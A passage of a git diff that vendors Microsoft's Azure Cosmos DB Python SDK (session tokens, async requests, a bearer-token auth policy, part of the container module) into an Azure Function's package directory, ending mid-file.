+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Internal Helper functions in the Azure Cosmos database service.
+""" + +import platform +import re +from ._version import VERSION + + +def get_user_agent(): + os_name = safe_user_agent_header(platform.platform()) + python_version = safe_user_agent_header(platform.python_version()) + user_agent = "azsdk-python-cosmos/{} Python/{} ({})".format(VERSION, python_version, os_name) + return user_agent + + +def get_user_agent_async(): + os_name = safe_user_agent_header(platform.platform()) + python_version = safe_user_agent_header(platform.python_version()) + user_agent = "azsdk-python-cosmos-async/{} Python/{} ({})".format(VERSION, python_version, os_name) + return user_agent + + +def safe_user_agent_header(s): + if s is None: + s = "unknown" + # remove all white spaces + s = re.sub(r"\s+", "", s) + if not s: + s = "unknown" + return s diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_vector_session_token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_vector_session_token.py new file mode 100644 index 0000000..82ddb17 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_vector_session_token.py @@ -0,0 +1,175 @@ +# The MIT License (MIT) +# Copyright (c) 2018 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Session Consistency Tracking in the Azure Cosmos database service. +""" + +from . 
import exceptions +from .http_constants import StatusCodes + + +class VectorSessionToken(object): + segment_separator = "#" + region_progress_separator = "=" + + def __init__(self, version, global_lsn, local_lsn_by_region, session_token=None): + + self.version = version + self.global_lsn = global_lsn + self.local_lsn_by_region = local_lsn_by_region + self.session_token = session_token + + if self.session_token is None: + region_and_local_lsn = [] + + for key in self.local_lsn_by_region: + region_and_local_lsn.append( + str(key) + self.region_progress_separator + str(self.local_lsn_by_region[key]) + ) + + region_progress = self.segment_separator.join(region_and_local_lsn) + if not region_progress: + self.session_token = "%s%s%s" % (self.version, self.segment_separator, self.global_lsn) + else: + self.session_token = "%s%s%s%s%s" % ( + self.version, + self.segment_separator, + self.global_lsn, + self.segment_separator, + region_progress, + ) + + @classmethod + def create(cls, session_token): # pylint: disable=too-many-return-statements + """Parses session token and creates the vector session token + + :param str session_token: + :return: A Vector session Token + :rtype: VectorSessionToken + """ + + version = None + global_lsn = None + local_lsn_by_region = {} + + if not session_token: + return None + + segments = session_token.split(cls.segment_separator) + + if len(segments) < 2: + return None + + try: + version = int(segments[0]) + except ValueError as _: + return None + + try: + global_lsn = int(segments[1]) + except ValueError as _: + return None + + for i in range(2, len(segments)): + region_segment = segments[i] + region_id_with_lsn = region_segment.split(cls.region_progress_separator) + + if len(region_id_with_lsn) != 2: + return None + + try: + region_id = int(region_id_with_lsn[0]) + local_lsn = int(region_id_with_lsn[1]) + except ValueError as _: + return None + local_lsn_by_region[region_id] = local_lsn + + return VectorSessionToken(version, global_lsn, local_lsn_by_region, session_token) + + def equals(self, other): + if other is None: + return False + return ( + self.version == other.version + and self.global_lsn == other.global_lsn + and self.are_region_progress_equal(other.local_lsn_by_region) + ) + + def merge(self, other): + if other is None: + raise ValueError("Invalid Session Token (should not be None)") + + if self.version == other.version and len(self.local_lsn_by_region) != len(other.local_lsn_by_region): + raise exceptions.CosmosHttpResponseError( + status_code=StatusCodes.INTERNAL_SERVER_ERROR, + message=("Compared session tokens '%s' and '%s' have unexpected regions." 
+ % (self.session_token, other.session_token)) + ) + + if self.version < other.version: + session_token_with_lower_version = self + session_token_with_higher_version = other + else: + session_token_with_lower_version = other + session_token_with_higher_version = self + + highest_local_lsn_by_region = {} + + for key in session_token_with_higher_version.local_lsn_by_region: + region_id = key + local_lsn1 = session_token_with_higher_version.local_lsn_by_region[key] + local_lsn2 = ( + session_token_with_lower_version.local_lsn_by_region[region_id] + if region_id in session_token_with_lower_version.local_lsn_by_region + else None + ) + + if local_lsn2 is not None: + highest_local_lsn_by_region[region_id] = max(local_lsn1, local_lsn2) + elif self.version == other.version: + raise exceptions.CosmosHttpResponseError( + status_code=StatusCodes.INTERNAL_SERVER_ERROR, + message=("Compared session tokens '%s' and '%s' have unexpected regions." + % (self.session_token, other.session_token)) + ) + else: + highest_local_lsn_by_region[region_id] = local_lsn1 + + return VectorSessionToken( + max(self.version, other.version), max(self.global_lsn, other.global_lsn), highest_local_lsn_by_region + ) + + def convert_to_string(self): + return self.session_token + + def are_region_progress_equal(self, other): + if len(self.local_lsn_by_region) != len(other): + return False + + for key in self.local_lsn_by_region: + region_id = key + local_lsn1 = self.local_lsn_by_region[region_id] + local_lsn2 = other[region_id] if region_id in other else None + + if local_lsn2 is not None: + if local_lsn1 != local_lsn2: + return False + return True diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_version.py new file mode 100644 index 0000000..6f4a741 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_version.py @@ -0,0 +1,22 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. 
+ +VERSION = "4.3.0" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__init__.py new file mode 100644 index 0000000..1e73a22 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__init__.py @@ -0,0 +1,34 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +from ._container import ContainerProxy +from ._cosmos_client import CosmosClient +from ._database import DatabaseProxy +from ._user import UserProxy +from ._scripts import ScriptsProxy + +__all__ = ( + "CosmosClient", + "DatabaseProxy", + "ContainerProxy", + "ScriptsProxy", + "UserProxy" +) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b540282 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_asynchronous_request.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_asynchronous_request.cpython-39.pyc new file mode 100644 index 0000000..f98e7b0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_asynchronous_request.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_auth_policy_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_auth_policy_async.cpython-39.pyc new file mode 100644 index 0000000..c760425 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_auth_policy_async.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_container.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_container.cpython-39.pyc new file mode 100644 index 0000000..84b95bc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_container.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client.cpython-39.pyc new file mode 100644 index 0000000..60ea135 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client_connection_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client_connection_async.cpython-39.pyc new file mode 100644 index 0000000..66fa7ca Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client_connection_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_database.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_database.cpython-39.pyc new file mode 100644 index 0000000..11320bf Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_database.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_global_endpoint_manager_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_global_endpoint_manager_async.cpython-39.pyc new file mode 100644 index 0000000..dee1eaa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_global_endpoint_manager_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_query_iterable_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_query_iterable_async.cpython-39.pyc new file mode 100644 index 0000000..4da3946 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_query_iterable_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_retry_utility_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_retry_utility_async.cpython-39.pyc new file mode 100644 index 0000000..349d140 Binary 
files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_retry_utility_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_scripts.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_scripts.cpython-39.pyc new file mode 100644 index 0000000..3771ae7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_scripts.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_user.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_user.cpython-39.pyc new file mode 100644 index 0000000..c77f326 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_user.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_asynchronous_request.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_asynchronous_request.py new file mode 100644 index 0000000..1ba1578 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_asynchronous_request.py @@ -0,0 +1,184 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Asynchronous request in the Azure Cosmos database service. +""" + +import json +import time + +from urllib.parse import urlparse +from azure.core.exceptions import DecodeError # type: ignore + +from .. import exceptions +from .. import http_constants +from . import _retry_utility_async +from .._synchronized_request import _request_body_from_data + + +async def _Request(global_endpoint_manager, request_params, connection_policy, pipeline_client, request, **kwargs): + """Makes one http request using the requests module. 
+ + :param _GlobalEndpointManager global_endpoint_manager: + :param dict request_params: + contains the resourceType, operationType, endpointOverride, + useWriteEndpoint, useAlternateWriteEndpoint information + :param documents.ConnectionPolicy connection_policy: + :param azure.core.PipelineClient pipeline_client: + Pipeline client to process the request + :param azure.core.HttpRequest request: + The request object to send through the pipeline + :return: tuple of (result, headers) + :rtype: tuple of (dict, dict) + + """ + # pylint: disable=protected-access + + connection_timeout = connection_policy.RequestTimeout + connection_timeout = kwargs.pop("connection_timeout", connection_timeout / 1000.0) + + # Every request tries to perform a refresh + client_timeout = kwargs.get('timeout') + start_time = time.time() + await global_endpoint_manager.refresh_endpoint_list(None, **kwargs) + if client_timeout is not None: + kwargs['timeout'] = client_timeout - (time.time() - start_time) + if kwargs['timeout'] <= 0: + raise exceptions.CosmosClientTimeoutError() + + if request_params.endpoint_override: + base_url = request_params.endpoint_override + else: + base_url = global_endpoint_manager.resolve_service_endpoint(request_params) + if base_url != pipeline_client._base_url: + request.url = request.url.replace(pipeline_client._base_url, base_url) + + parse_result = urlparse(request.url) + + # The requests library now expects header values to be strings only starting 2.11, + # and will raise an error on validation if they are not, so casting all header values to strings. + request.headers.update({header: str(value) for header, value in request.headers.items()}) + + # We are disabling the SSL verification for local emulator(localhost/127.0.0.1) or if the user + # has explicitly specified to disable SSL verification. 
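+    # Mirrors the synchronous _synchronized_request module: verification remains
+    # enabled for regular account endpoints and is skipped only for
+    # localhost/127.0.0.1 (e.g. the local emulator) or when the connection policy
+    # explicitly disables SSL verification.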
+ is_ssl_enabled = ( + parse_result.hostname != "localhost" + and parse_result.hostname != "127.0.0.1" + and not connection_policy.DisableSSLVerification + ) + + if connection_policy.SSLConfiguration or "connection_cert" in kwargs: + ca_certs = connection_policy.SSLConfiguration.SSLCaCerts + cert_files = (connection_policy.SSLConfiguration.SSLCertFile, connection_policy.SSLConfiguration.SSLKeyFile) + response = await _PipelineRunFunction( + pipeline_client, + request, + connection_timeout=connection_timeout, + connection_verify=kwargs.pop("connection_verify", ca_certs), + connection_cert=kwargs.pop("connection_cert", cert_files), + **kwargs + ) + else: + response = await _PipelineRunFunction( + pipeline_client, + request, + connection_timeout=connection_timeout, + # If SSL is disabled, verify = false + connection_verify=kwargs.pop("connection_verify", is_ssl_enabled), + **kwargs + ) + + response = response.http_response + headers = dict(response.headers) + + data = response.body() + if data: + data = data.decode("utf-8") + + if response.status_code == 404: + raise exceptions.CosmosResourceNotFoundError(message=data, response=response) + if response.status_code == 409: + raise exceptions.CosmosResourceExistsError(message=data, response=response) + if response.status_code == 412: + raise exceptions.CosmosAccessConditionFailedError(message=data, response=response) + if response.status_code >= 400: + raise exceptions.CosmosHttpResponseError(message=data, response=response) + + result = None + if data: + try: + result = json.loads(data) + except Exception as e: + raise DecodeError( + message="Failed to decode JSON data: {}".format(e), + response=response, + error=e) + + return result, headers + + +async def _PipelineRunFunction(pipeline_client, request, **kwargs): + # pylint: disable=protected-access + + return await pipeline_client._pipeline.run(request, **kwargs) + +async def AsynchronousRequest( + client, + request_params, + global_endpoint_manager, + connection_policy, + pipeline_client, + request, + request_data, + **kwargs +): + """Performs one asynchronous http request according to the parameters. + + :param object client: Document client instance + :param dict request_params: + :param _GlobalEndpointManager global_endpoint_manager: + :param documents.ConnectionPolicy connection_policy: + :param azure.core.PipelineClient pipeline_client: PipelineClient to process the request. 
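# --- Illustrative sketch (not part of the SDK) ---
# The status-code dispatch inside _Request above amounts to a small mapping from
# HTTP status to the typed exceptions in azure.cosmos.exceptions. A standalone
# helper expressing the same rule might look like this; the helper name is
# hypothetical, but the exception constructors are used exactly as _Request uses them.
from azure.cosmos import exceptions

def raise_for_cosmos_status(status_code, data, response):
    # Order matters: the specific 404/409/412 cases come before the
    # generic catch-all for any other 4xx/5xx response.
    if status_code == 404:
        raise exceptions.CosmosResourceNotFoundError(message=data, response=response)
    if status_code == 409:
        raise exceptions.CosmosResourceExistsError(message=data, response=response)
    if status_code == 412:
        raise exceptions.CosmosAccessConditionFailedError(message=data, response=response)
    if status_code >= 400:
        raise exceptions.CosmosHttpResponseError(message=data, response=response)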
+ :param str method: + :param str path: + :param (str, unicode, file-like stream object, dict, list or None) request_data: + :param dict query_params: + :param dict headers: + :return: tuple of (result, headers) + :rtype: tuple of (dict, dict) + """ + request.data = _request_body_from_data(request_data) + if request.data and isinstance(request.data, str): + request.headers[http_constants.HttpHeaders.ContentLength] = len(request.data) + elif request.data is None: + request.headers[http_constants.HttpHeaders.ContentLength] = 0 + + # Pass _Request function with its parameters to retry_utility's Execute method that wraps the call with retries + return await _retry_utility_async.ExecuteAsync( + client, + global_endpoint_manager, + _Request, + request_params, + connection_policy, + pipeline_client, + request, + **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_auth_policy_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_auth_policy_async.py new file mode 100644 index 0000000..be808a2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_auth_policy_async.py @@ -0,0 +1,175 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See LICENSE.txt in the project root for +# license information. +# ------------------------------------------------------------------------- +import asyncio +import time + +from typing import Any, Awaitable, Optional, Dict, Union +from azure.core.pipeline.policies import AsyncHTTPPolicy +from azure.core.credentials import AccessToken +from azure.core.pipeline import PipelineRequest, PipelineResponse +from azure.cosmos import http_constants + + +async def await_result(func, *args, **kwargs): + """If func returns an awaitable, await it.""" + result = func(*args, **kwargs) + if hasattr(result, "__await__"): + # type ignore on await: https://github.com/python/mypy/issues/7587 + return await result # type: ignore + return result + + +class _AsyncCosmosBearerTokenCredentialPolicyBase(object): + """Base class for a Bearer Token Credential Policy. + + :param credential: The credential. + :type credential: ~azure.core.credentials.TokenCredential + :param str scopes: Lets you specify the type of access needed. + """ + + def __init__(self, credential, *scopes, **kwargs): # pylint:disable=unused-argument + # type: (TokenCredential, *str, **Any) -> None + super(_AsyncCosmosBearerTokenCredentialPolicyBase, self).__init__() + self._scopes = scopes + self._credential = credential + self._token = None # type: Optional[AccessToken] + self._lock = asyncio.Lock() + + @staticmethod + def _enforce_https(request): + # type: (PipelineRequest) -> None + + # move 'enforce_https' from options to context so it persists + # across retries but isn't passed to a transport implementation + option = request.context.options.pop("enforce_https", None) + + # True is the default setting; we needn't preserve an explicit opt in to the default behavior + if option is False: + request.context["enforce_https"] = option + + enforce_https = request.context.get("enforce_https", True) + if enforce_https and not request.http_request.url.lower().startswith("https"): + raise ValueError( + "Bearer token authentication is not permitted for non-TLS protected (non-https) URLs."
+ ) + + @staticmethod + def _update_headers(headers, token): + # type: (Dict[str, str], str) -> None + """Updates the Authorization header with the cosmos signature and bearer token. + This is the main method that differentiates this policy from core's BearerTokenCredentialPolicy and works + to properly sign the authorization header for Cosmos' REST API. For more information: + https://docs.microsoft.com/rest/api/cosmos-db/access-control-on-cosmosdb-resources#authorization-header + + :param dict headers: The HTTP Request headers + :param str token: The OAuth token. + """ + headers[http_constants.HttpHeaders.Authorization] = "type=aad&ver=1.0&sig={}".format(token) + + @property + def _need_new_token(self) -> bool: + return not self._token or self._token.expires_on - time.time() < 300 + + +class AsyncCosmosBearerTokenCredentialPolicy(_AsyncCosmosBearerTokenCredentialPolicyBase, AsyncHTTPPolicy): + """Adds a bearer token Authorization header to requests. + + :param credential: The credential. + :type credential: ~azure.core.TokenCredential + :param str scopes: Lets you specify the type of access needed. + :raises ValueError: If enforce_https is enabled and the request endpoint is not an HTTPS URL. + """ + + async def on_request(self, request: "PipelineRequest") -> None: # pylint:disable=invalid-overridden-method + """Adds a bearer token Authorization header to request and sends request to next policy. + + :param request: The pipeline request object to be modified. + :type request: ~azure.core.pipeline.PipelineRequest + :raises: :class:`~azure.core.exceptions.ServiceRequestError` + """ + self._enforce_https(request) # pylint:disable=protected-access + + if self._token is None or self._need_new_token: + async with self._lock: + # double check because another coroutine may have acquired a token while we waited to acquire the lock + if self._token is None or self._need_new_token: + self._token = await self._credential.get_token(*self._scopes) + self._update_headers(request.http_request.headers, self._token.token) + + async def authorize_request(self, request: "PipelineRequest", *scopes: str, **kwargs: "Any") -> None: + """Acquire a token from the credential and authorize the request with it. + + Keyword arguments are passed to the credential's get_token method. The token will be cached and used to + authorize future requests.
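# Hedged sketch: the refresh rule this policy applies, factored out for clarity.
# A cached AccessToken is reused until it is within 300 seconds of expiry, and the
# re-check happens under an asyncio.Lock so concurrent coroutines do not all call
# get_token. The TokenCache class itself is hypothetical; credential is any object
# exposing an async get_token(*scopes) that returns an AccessToken.
import asyncio
import time

class TokenCache:
    def __init__(self, credential, *scopes):
        self._credential = credential
        self._scopes = scopes
        self._token = None
        self._lock = asyncio.Lock()

    async def get(self) -> str:
        if self._token is None or self._token.expires_on - time.time() < 300:
            async with self._lock:
                # double check: another coroutine may have refreshed while we waited
                if self._token is None or self._token.expires_on - time.time() < 300:
                    self._token = await self._credential.get_token(*self._scopes)
        # The policy above then signs the header as "type=aad&ver=1.0&sig=<token>".
        return self._token.token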
+ + :param ~azure.core.pipeline.PipelineRequest request: the request + :param str scopes: required scopes of authentication + """ + async with self._lock: + self._token = await self._credential.get_token(*scopes, **kwargs) + self._update_headers(request.http_request.headers, self._token.token) + + async def send(self, request: "PipelineRequest") -> "PipelineResponse": + """Authorize request with a bearer token and send it to the next policy + + :param request: The pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + await await_result(self.on_request, request) + try: + response = await self.next.send(request) + await await_result(self.on_response, request, response) + except Exception: # pylint:disable=broad-except + handled = await await_result(self.on_exception, request) + if not handled: + raise + else: + if response.http_response.status_code == 401: + self._token = None # any cached token is invalid + if "WWW-Authenticate" in response.http_response.headers: + request_authorized = await self.on_challenge(request, response) + if request_authorized: + try: + response = await self.next.send(request) + await await_result(self.on_response, request, response) + except Exception: # pylint:disable=broad-except + handled = await await_result(self.on_exception, request) + if not handled: + raise + + return response + + async def on_challenge(self, request: "PipelineRequest", response: "PipelineResponse") -> bool: + """Authorize request according to an authentication challenge + + This method is called when the resource provider responds 401 with a WWW-Authenticate header. + + :param ~azure.core.pipeline.PipelineRequest request: the request which elicited an authentication challenge + :param ~azure.core.pipeline.PipelineResponse response: the resource provider's response + :returns: a bool indicating whether the policy should send the request + """ + # pylint:disable=unused-argument,no-self-use + return False + + def on_response(self, request: PipelineRequest, response: PipelineResponse) -> Union[None, Awaitable[None]]: + """Executed after the request comes back from the next policy. + + :param request: Request to be modified after returning from the policy. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: Pipeline response object + :type response: ~azure.core.pipeline.PipelineResponse + """ + + def on_exception(self, request: PipelineRequest) -> None: + """Executed when an exception is raised while executing the next policy. + + This method is executed inside the exception handler. 
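# Hedged sketch: on_challenge above returns False, so a 401 response is simply
# handed back to the caller. A subclass (hypothetical, not part of the SDK) that
# wants send() to retry after a WWW-Authenticate challenge could re-sign the
# request with authorize_request and return True:
class RetryOnChallengePolicy(AsyncCosmosBearerTokenCredentialPolicy):
    async def on_challenge(self, request, response) -> bool:
        # Re-acquire a token for the original scopes; send() clears the cached
        # token before calling this, so a fresh one is fetched.
        await self.authorize_request(request, *self._scopes)
        return True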
+ + :param request: The Pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + # pylint: disable=no-self-use,unused-argument + return diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_container.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_container.py new file mode 100644 index 0000000..e1911d0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_container.py @@ -0,0 +1,762 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, update and delete items in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, Dict, Optional, Union, cast, Awaitable +from azure.core.async_paging import AsyncItemPaged + +from azure.core.tracing.decorator import distributed_trace +from azure.core.tracing.decorator_async import distributed_trace_async # type: ignore + +from ._cosmos_client_connection_async import CosmosClientConnection +from .._base import build_options as _build_options, validate_cache_staleness_value +from ..exceptions import 